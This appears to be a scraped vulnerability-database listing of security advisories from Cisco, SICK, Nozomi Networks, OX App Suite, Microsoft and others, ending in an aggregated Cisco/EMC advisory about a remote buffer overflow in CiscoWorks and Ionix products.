cisco-sa-contcent-insuffacces-ardovhn8	Cisco Unified Contact Center Enterprise Cloud Connect Insufficient Access Control Vulnerability	2025-05-21T16:00:00+00:00	2025-05-21T16:00:00+00:00
cisco-sa-sdwan-fileoverwrite-uc9txwh	Cisco Catalyst SD-WAN Manager Arbitrary File Overwrite Vulnerability	2025-05-07T16:00:00+00:00	2025-05-08T15:55:57+00:00
cisco-sa-wlc-wncd-p6gvt6hl	Cisco IOS XE Software for WLC Wireless IPv6 Clients Denial of Service Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-webui-multi-arnhm4v6	Cisco IOS XE Software Web-Based Management Interface Vulnerabilities	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-webui-cmdinj-gvn3oknc	Cisco IOS XE Software Web-Based Management Interface Command Injection Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-vmanage-xss-xhn8m5jt	Cisco Catalyst SD-WAN Manager Stored Cross-Site Scripting Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-vmanage-html-inj-gxvtk6zj	Cisco Catalyst SD-WAN Manager Reflected HTML Injection Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-twamp-kv4fhugn	Cisco IOS, IOS XE, and IOS XR Software TWAMP Denial of Service Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-snmpv3-qkeyvzsy	Cisco IOS and IOS XE Software SNMPv3 Configuration Restriction Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-snmp-bypass-hhuvujdn	Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00
cisco-sa-sisf-dos-zgwt4ddy	Multiple Cisco Products Switch Integrated Security Features DHCPv6 Denial of Service Vulnerability	2025-05-07T16:00:00+00:00	2025-05-07T16:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
sca-2025-0003	FreeRTOS Vulnerabilities have no impact on SICK Products	2025-02-28T00:00:00.000Z	2025-05-20T11:00:00.000Z
sca-2025-0006	Vulnerability affecting picoScan and multiScan	2025-04-28T13:00:00.000Z	2025-04-28T13:00:00.000Z
sca-2025-0005	Vulnerabilities in SICK Flexi Compact	2025-04-28T10:00:00.000Z	2025-04-28T10:00:00.000Z
sca-2025-0001	Multiple vulnerabilities in SICK MEAC300	2025-02-14T14:00:00.000Z	2025-02-21T14:00:00.000Z
sca-2024-0003	Critical vulnerability in multiple SICK products	2024-10-17T13:00:00.000Z	2024-10-17T13:00:00.000Z
sca-2024-0001	Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics	2024-01-29T00:00:00.000Z	2024-01-29T00:00:00.000Z
sca-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
SCA-2023-0011	Vulnerability in multiple SICK Flexi Soft Gateways	2023-10-23T11:00:00.000Z	2023-10-23T11:00:00.000Z
sca-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
SCA-2023-0010	Vulnerabilities in SICK Application Processing Unit	2023-10-09T11:00:00.000Z	2023-10-09T11:00:00.000Z
sca-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
SCA-2023-0008	Vulnerability in SICK SIM1012	2023-09-29T13:00:00.000Z	2023-09-29T13:00:00.000Z
sca-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
SCA-2023-0009	Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products	2023-09-29T10:00:00.000Z	2023-09-29T10:00:00.000Z
sca-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
SCA-2023-0007	Vulnerabilities in SICK LMS5xx	2023-08-25T11:00:00.000Z	2023-08-25T11:00:00.000Z
sca-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
SCA-2023-0006	Vulnerabilities in SICK ICR890-4	2023-07-10T13:00:00.000Z	2023-07-10T13:00:00.000Z
sca-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
SCA-2023-0005	Vulnerabilities in SICK EventCam App	2023-06-19T11:00:00.000Z	2023-06-19T11:00:00.000Z
sca-2023-0004	Vulnerabilities in SICK FTMg	2023-05-11T13:00:00.000Z	2023-05-11T13:00:00.000Z
SCA-2023-0004	Vulnerabilities in SICK FTMg	2023-05-11T13:00:00.000Z	2023-05-11T13:00:00.000Z
sca-2023-0003	Vulnerability in SICK Flexi Soft and Flexi Classic Gateways	2023-05-03T13:00:00.000Z	2023-05-03T13:00:00.000Z
SCA-2023-0003	Vulnerability in SICK Flexi Soft and Flexi Classic Gateways	2023-05-03T13:00:00.000Z	2023-05-03T13:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
nn-2025:2-01	Privilege escalation in Guardian/CMC before 24.6.0	2025-06-10T11:00:00.000Z	2025-06-10T11:00:00.000Z
nn-2025:1-01	Authenticated RCE in update functionality in Guardian/CMC before 24.6.0	2025-06-10T11:00:00.000Z	2025-06-10T11:00:00.000Z
nn-2023_17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
NN-2023:17-01	Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-11T11:00:00.000Z
nn-2024_1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
NN-2024:1-01	DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1	2024-04-10T11:00:00.000Z	2024-04-10T11:00:00.000Z
nn-2023_12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
NN-2023:12-01	Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0	2024-01-15T11:00:00.000Z	2024-01-16T11:00:00.000Z
nn-2023_9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_11-01	SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_10-01	DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023_1-01	Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2	2023-05-03T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:9-01	Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0	2023-09-18T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:8-01	Session Fixation in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:7-01	DoS via SAML configuration in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:6-01	Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:5-01	Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:4-01	Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:3-01	Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z
nn-2023:2-01	Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2	2023-08-09T11:00:00.000Z	2023-11-16T11:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
oxas-adv-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
OXAS-ADV-2024-0002	OX App Suite Security Advisory OXAS-ADV-2024-0002	2024-03-06T00:00:00+01:00	2024-05-06T00:00:00+00:00
oxas-adv-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
OXAS-ADV-2024-0001	OX App Suite Security Advisory OXAS-ADV-2024-0001	2024-02-08T00:00:00+01:00	2024-04-25T00:00:00+00:00
oxas-adv-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
OXAS-ADV-2023-0007	OX App Suite Security Advisory OXAS-ADV-2023-0007	2023-12-11T00:00:00+01:00	2024-02-16T00:00:00+00:00
oxas-adv-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
oxas-adv-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0006	OX App Suite Security Advisory OXAS-ADV-2023-0006	2023-09-25T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0005	OX App Suite Security Advisory OXAS-ADV-2023-0005	2023-09-19T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0004	OX App Suite Security Advisory OXAS-ADV-2023-0004	2023-08-01T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0003	OX App Suite Security Advisory OXAS-ADV-2023-0003	2023-05-02T00:00:00+02:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0002	OX App Suite Security Advisory OXAS-ADV-2023-0002	2023-03-20T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2023-0001	OX App Suite Security Advisory OXAS-ADV-2023-0001	2023-02-06T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0002	OX App Suite Security Advisory OXAS-ADV-2022-0002	2022-11-02T00:00:00+01:00	2024-01-22T00:00:00+00:00
OXAS-ADV-2022-0001	OX App Suite Security Advisory OXAS-ADV-2022-0001	2022-08-10T00:00:00+02:00	2024-01-22T00:00:00+00:00

Vulnerabilities are sorted by update time (recent to old).
ID	Description	Published	Updated
msrc_cve-2025-21385	Microsoft Purview Information Disclosure Vulnerability	2025-01-09T08:00:00.000Z	2025-01-09T08:00:00.000Z
msrc_cve-2025-21380	Azure Marketplace SaaS Resources Information Disclosure Vulnerability	2025-01-09T08:00:00.000Z	2025-01-09T08:00:00.000Z
msrc_cve-2024-43594	Microsoft System Center Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2025-01-07T08:00:00.000Z
msrc_cve-2024-49051	Microsoft PC Manager Elevation of Privilege Vulnerability	2024-11-12T08:00:00.000Z	2024-12-31T08:00:00.000Z
msrc_cve-2024-43601	Visual Studio Code for Linux Remote Code Execution Vulnerability	2024-10-08T07:00:00.000Z	2024-12-27T08:00:00.000Z
msrc_cve-2024-43600	Microsoft Office Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-23T08:00:00.000Z
msrc_cve-2013-3900	WinVerifyTrust Signature Validation Vulnerability	2022-01-11T08:00:00.000Z	2024-12-23T08:00:00.000Z
msrc_cve-2024-49128	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-16T08:00:00.000Z
msrc_cve-2024-49116	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-16T08:00:00.000Z
msrc_cve-2024-49147	Microsoft Update Catalog Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49071	Windows Defender Information Disclosure Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49069	Microsoft Excel Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-43451	NTLM Hash Disclosure Spoofing Vulnerability	2024-11-12T08:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-38183	GroupMe Elevation of Privilege Vulnerability	2024-09-10T07:00:00.000Z	2024-12-12T08:00:00.000Z
msrc_cve-2024-49112	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-11T08:00:00.000Z
msrc_cve-2024-49142	Microsoft Access Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49138	Windows Common Log File System Driver Elevation of Privilege Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49132	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49129	Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49127	Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49126	Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49125	Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49124	Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49123	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49122	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49121	Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49120	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49119	Windows Remote Desktop Services Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49118	Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z
msrc_cve-2024-49117	Windows Hyper-V Remote Code Execution Vulnerability	2024-12-10T08:00:00.000Z	2024-12-10T08:00:00.000Z

Vulnerabilities are sorted by update time (recent to old).
ID	Description
var-202407-2188	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202406-3119	Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 is a new generation of multi-service security gateway. Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-1740	NBR6135-E is a router. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6135-E has a command execution vulnerability, and attackers can exploit the vulnerability to execute commands.
var-202407-1417	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause equipment shutdown and manually restart the PLC to recover.
var-202407-1103	Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202407-0957	WinCC is a SCADA system suitable for all walks of life. It can access devices from mobile terminals, extract intelligent data, analyze data and make reports. Siemens (China) Co., Ltd. WinCC has a denial of service vulnerability, which can be exploited by attackers to cause denial of service.
var-202407-0819	SIMATIC S7-1500 is a modular control system suitable for various automation applications in the field of discrete automation. There is a denial of service vulnerability in SIMATIC S7-1500 of Siemens (China) Co., Ltd., which can be exploited by attackers to cause denial of service.
var-202407-0818	NBR6210-E is a router product. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6210-E has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-0779	Tenda i29V1.0 V1.0.0.5 was discovered to contain a hardcoded password for root. Tenda of i29 A vulnerability exists in the firmware regarding the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0778	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/addWifiMacFilter. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202407-0745	Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo. Tenda of AC18 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
var-202305-1479	D-Link DIR-2150 SetTriggerPPPoEValidate Username Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2150 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the SOAP API interface, which listens on TCP port 80 by default. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20554. D-Link DIR-2150 is a wireless router from D-Link, a Chinese company
var-202108-1158	A race condition was addressed with improved locking. This issue is fixed in macOS Monterey 12.0.1, macOS Big Sur 11.5. An application may be able to gain elevated privileges. apple's macOS There is a race condition vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. REJECT DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by the CVE program. Notes: none
var-201109-0089	Multiple unspecified vulnerabilities in Cisco Unified Service Monitor before 8.6, as used in Unified Operations Manager before 8.6 and CiscoWorks LAN Management Solution 3.x and 4.x before 4.1; and multiple EMC Ionix products including Application Connectivity Monitor (Ionix ACM) 2.3 and earlier, Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier, IP Management Suite (Ionix IP) 8.1.1.1 and earlier, and other Ionix products; allow remote attackers to execute arbitrary code via crafted packets to TCP port 9002, aka Bug IDs CSCtn42961 and CSCtn64922, related to a buffer overflow. Cisco Unified Operations Manager and CiscoWorks LAN Management Solution Used in Cisco Unified Service Monitor Contains a vulnerability that allows arbitrary code execution. The problem is Bug ID CSCtn42961 and CSCtn64922 It is a problem.Skillfully crafted by a third party TCP port 9002 Arbitrary code could be executed via packets. Authentication is not required to exploit this vulnerability.The flaw exists within the brstart.exe service which listens by default on TCP port 9002. When handling an add_dm request the process uses a user provided value to allocate a buffer then blindly copies user supplied data into a fixed-length buffer on the heap. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the casuser user. Multiple EMC Ionix applications are prone to a buffer-overflow vulnerability. Successful exploits will result in the complete compromise of affected applications. Failed exploit attempts will result in a denial-of-service condition. The following applications are affected. Ionix Application Connectivity Monitor (Ionix ACM) version 2.3 and prior Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) version 3.2.0.2 and prior Ionix IP Management Suite (Ionix IP) version 8.1.1.1 and prior Ionix IPv6 Management Suite (Ionix IPv6) version 2.0.2 and prior Ionix MPLS Management Suite (Ionix MPLS) version 4.0.0 and prior Ionix Multicast Manager (Ionix MCAST) version 2.1 and prior Ionix Network Protocol Management Suite version (Ionix NPM) 3.1 and prior Ionix Optical Transport Management Suite version (Ionix OTM) 5.1 and prior Ionix Server Manager (EISM) version 3.0 and prior Ionix Service Assurance Management Suite (Ionix SAM) version 8.1.0.6 and prior Ionix Storage Insight for Availability Suite (Ionix SIA) version 2.3.1 and prior Ionix VoIP Availability Management Suite (Ionix VoIP AM) version 4.0.0.3 and prior. Details ======= CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home > Support > Software Downloads and Licensing > Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. The Software Update page displays the licensing and software version. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details +---------------------------- Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact ====== Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes =========================== When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Mitigation Bulletin companion document for this advisory, which is available at the following link: http://www.cisco.com/warp/public/707/cisco-amb-201100914-cusm-lms.shtml Obtaining Fixed Software ======================== Cisco has released free software updates that address these vulnerabilities. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment. Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html or as otherwise set forth at Cisco.com Downloads at: http://www.cisco.com/public/sw-center/sw-usingswc.shtml Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades. Customers with Service Contracts +------------------------------- Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com. Customers using Third Party Support Organizations +------------------------------------------------ Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory. The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed. Customers without Service Contracts +---------------------------------- Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows. * +1 800 553 2447 (toll free from within North America) * +1 408 526 7209 (toll call from anywhere in the world) * e-mail: tac@cisco.com Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC. Refer to: http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages. Exploitation and Public Announcements ===================================== The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerabilities described in this advisory. These vulnerabilities were reported to Cisco by ZDI and discovered by AbdulAziz Hariri. Status of this Notice: FINAL ============================ THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors. Distribution ============ This advisory is posted on Cisco's worldwide website at : http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients. * cust-security-announce@cisco.com * first-bulletins@lists.first.org * bugtraq@securityfocus.com * vulnwatch@vulnwatch.org * cisco@spot.colorado.edu * cisco-nsp@puck.nether.net * 